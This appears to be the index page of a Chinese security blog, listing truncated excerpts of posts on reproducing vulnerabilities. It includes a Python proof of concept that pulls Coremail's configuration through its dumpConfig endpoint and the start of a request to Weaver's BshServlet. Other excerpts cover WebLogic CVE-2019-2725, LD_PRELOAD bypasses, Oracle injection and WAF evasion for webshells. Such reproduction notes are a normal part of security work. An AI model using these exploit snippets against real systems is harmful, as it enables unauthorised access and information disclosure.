GET / HTTP/1.1 Host: 192.168.1.16 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63....

群里无意中讨论了。监控漏洞平台的那些安全预警 然后发现阿里云的安全公告挺及时的。就造了一个轮子。 emmm 此代码基于宝塔面板开发的。记得安装宝塔面板才能执行哦 ...

emmmm POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host:127.0.0.1:8080 Content-Length: 151 Cache-Control: max-age=0 Origin: http://127.0.0.1:8080 Upgrade-Insecure-Requests: 1 C...

环境如下 python 3.5.2 django 2.2.2 postgresql 11.0 安装postgresql   11.0 ...

pass 0x00 前言  ngx_lua_waf是一款基于ngx_lua的web应用防火墙，使用简单，高性能、轻量级。默认防御规则在wafconf目录中，摘录几条核心的SQL注入防御规则： select.+(from|...

我只是一个github 的搬运工 https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD 下载。之后。搭建一个测试环境

碰到了一个很复杂的SQL 注入的oracle 注入坑。 那么就弄一个本地测试环境吧 环境:Centos 7.4   64 那么首先弄一个oracle 环境 想了一下还是用Docker 了 dock...

CVE-2019-2725 绕过 复现 系统版本 Centos7.5 JDK 版本：jdk1.6.0_45     ：直接去官网下载 weblogic 版本：10.3.6      ： 直接去官网下载 ...

import requests,sys def mailsmsPoC(url): url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/" r = requests.get(url) if (r.status_code != '404') and ("/home/coremail...

思路真的可以，但我测试的时候发现网络延迟是最大的难题 原文：https://www.t00ls.net/thread-51085-1-2.html 日常我们遇到的WAF对webshell查杀拦截主要是通过文件内容分析查杀，和网络传输层面...